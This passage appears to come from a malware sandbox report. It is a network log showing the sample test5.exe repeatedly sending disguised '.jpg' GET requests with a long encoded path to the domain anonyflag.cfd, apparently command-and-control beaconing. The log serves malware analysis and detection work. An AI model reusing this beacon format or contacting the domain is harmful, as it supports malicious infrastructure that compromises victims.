                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:20 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:20 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:20 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lz6ayM1D6zcciM1FKaZVm9GjFJON9jIxu3E4jNnkD%2FzvHLBxjvC%2Btg%2BLDNR8vgLZc4tz0LAhEa2c6lypZti3sOlDK12zJonOtwNDSLK3Qpq%2BIc1tIIdFU40EGEozcV8J"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8a229574261-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1608&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1683967&cwnd=239&unsent_bytes=0&cid=36bc92e8288a044d&ts=492&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.449747104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:21 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:22 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:22 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:22 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BgmMv8iN6xCLX9S4PsWxB%2FMOGd2ah8KjGHANvNwHIg%2BT0FbYMTTgm5EEe9lC7GE9HBCFv4Z5zlnjYkctOmKG8ZLTWFTFMuqW300P9MkPPT0Y8jrF1P1qI%2BWweCflOZpH"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8ad9a1a7cb4-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1815&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1531200&cwnd=230&unsent_bytes=0&cid=5ab7be9ef77693b3&ts=508&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.449748104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:23 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:24 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:23 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: HIT
                    Age: 1
                    Last-Modified: Sat, 28 Dec 2024 10:36:22 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OchT4k1CBtTHuqo%2BHVo70ZmHXkC4nj7w9mQQVB%2Bj9fn8ytQCOmu1ajN5Fgy5DwnLRVqgIiggqMGYxR%2FsSrZDlll4j5eaSTXAzAQoLo36yp2qEvVtqOh8kSUJN5DMWtqC"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8b96a7f0f41-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1702&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1715628&cwnd=145&unsent_bytes=0&cid=be8cb6de3fdcbd3d&ts=458&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.449750104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:25 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:25 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:25 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:25 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVmsEMzXTpvIDQCc%2FgS6WxaHtnOVEdJxXekyCP6I0%2FzmBhPt7krhRo79Ji5OkLpIbt39TvtaCtXW8kL8fErm10F%2BqdXWo7heWdpVLOAiJ1D9AFYzKLUENsu%2FAbPX8UK9"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8c4ec768c1b-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1876&rtt_var=721&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1498204&cwnd=210&unsent_bytes=0&cid=318cf006e9e62feb&ts=506&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.449751104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:27 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:27 UTC874INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:27 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:27 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XC8qbS%2BTaeluUneFtJ08OKL0GKzdPXxzj5cU890PXFo3EmDfD9FX4GLGHmvcu7qhpynGEmM0BMXw7kjGbTFBtrOWMCG34A5EfJ0001QLA0XU%2FNHT2Qzsezoan26XsEma"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8d0aae572bc-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1843&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1573275&cwnd=252&unsent_bytes=0&cid=745ab244ce55adf7&ts=512&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.449752104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:29 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:29 UTC884INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:29 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:29 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3P%2FZ4nl%2B8KI1rsQm4K3sDCaFF4U6AgC%2B35HAZhRtGE2xEZPc%2FE%2Fd7DZMQXYGONyQpVCnIHECIlFJ7njg%2B7Qp6Cy0Q0w43ZE8THW8R2%2FHy6Q4W5Sspc3jBctAtRrZsFE"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8dc5c5032ca-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1988&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1392465&cwnd=221&unsent_bytes=0&cid=b982226034516624&ts=493&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.449753104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:31 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:31 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:31 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:31 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5H2sO4JSPsznDioSfpqXQSL5JV1RMlKnff3OoaRpDNYZ4ASXOuEcUzSnhjeC%2BKgH4FhVb7bE7MFiDx9rqXepSvxkv%2BbrIMpnJ%2Fyk42hA%2Fz5Nh1HnbCJsOSZH8ism0NW"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8e85a098ccd-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1917&rtt_var=726&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1501285&cwnd=195&unsent_bytes=0&cid=603665d67b66eea1&ts=522&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.449754104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:33 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:33 UTC882INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:33 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:33 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2%2Bj1hd30F89VQ8U4QNI%2Bojn3ePu2Ip%2BmH227m4%2B2%2FPwBNEYd7jxPz5LV9dEew5P1EKvRYqdkIIL%2BFNC1wfiBdVvybFhCsvVYzRzLpDZhjuS1hAZmgXr3tm4H9jnwXg0"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8f44c2a191e-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1500&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1938911&cwnd=238&unsent_bytes=0&cid=214d61bde7bf21cd&ts=509&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.449755104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:34 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:35 UTC888INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:35 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:35 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bt1QfrDJUs5kydeGmYzuoT3Y5%2F4G87x4zSpeCNjOq6SYIRF8WTm6HX%2Fc8Mq50FVRFyWrNF0oT%2F%2FjHcWzhNONn0appXngnM%2F1FWv8Etq%2BfgtP5GTk%2Bu90k%2FHlvgBN0KC%2F"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9002f8680d0-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1522&rtt_var=576&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1889967&cwnd=208&unsent_bytes=0&cid=f9eaeb835bdd66c3&ts=506&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.449756104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:36 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:37 UTC884INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:37 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:37 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLIMzo3u%2B4x9hDK0Ogn6Uleum%2Fefx2GtBYE%2Be8d1Kd7SIpidHMZeIcqa%2BembNDJnXmEEfMcmb4I%2FObvv1t4WL9V7nSeZqBtBYABm%2FfP%2FKZEvZLGjJVhY2rf018tGQeL9"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e90c483ec475-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1508&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1912246&cwnd=181&unsent_bytes=0&cid=250c9720943bb10d&ts=515&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.449757104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:38 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:39 UTC875INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:39 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:39 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eie3yGosXK2fAylRWrsGIjZtNqkQLBDWA3rv80xtcZLxkgNdXOi7oPcdpI3DP3ymFG01p3iDd7s3tZwC1LPaAdGW45WgPDNmWCF29xqHcG9ZTqTgJ%2B9EjWm9VIPHRxDF"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9189caf7292-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=30168&min_rtt=2045&rtt_var=17563&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1427872&cwnd=252&unsent_bytes=0&cid=806f222cd88a5002&ts=506&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.449758104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:40 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:41 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:41 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:41 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7otvQyvEaXZVmAILXWkWnajRyS1UCalFwXsU4MNkDxX%2Fqid6GROfx%2BmtgjIHvCBfoBWFtg8uwQ3koz4yf0mtVKPGSn9PWX6f2tHWgLJ14wlXv9zYva%2BvybF%2B61%2F5w7y"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9243ef918b8-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1759&rtt_var=729&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1660034&cwnd=186&unsent_bytes=0&cid=f18d25662a2cff52&ts=495&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.449759104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:42 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:43 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:42 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: HIT
                    Age: 1
                    Last-Modified: Sat, 28 Dec 2024 10:36:41 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3KW63zylEn6xyUxEll%2Fj3rOLWHlwK6mdcOcNiQLynoKNq1GY%2Ff0NCIg7IodVO4aGDJkIp6hupOa2U6TpountSTJmKPFfKIFXR3mMdlvV5skpIJojnq6Slhj18Lpz2m4"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e9300bbf0f8f-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1521&rtt_var=581&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1919789&cwnd=232&unsent_bytes=0&cid=c2ab662a2736ae6b&ts=461&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.449760104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:44 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:44 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:44 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:44 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkkjG1s4g3XStRMlZ%2F1b7pG4ruHiYWNTiPntOo5ATMdtnjpIiYk5VNpO4z%2F53NlQe2nILi4UqlYWjAWAULtad71%2BIX1NjiIvvtqiGfpBxVik%2B%2FH3IscBbVVfly1O4NbX"}],"group":"cf-nel","max_age":604800}
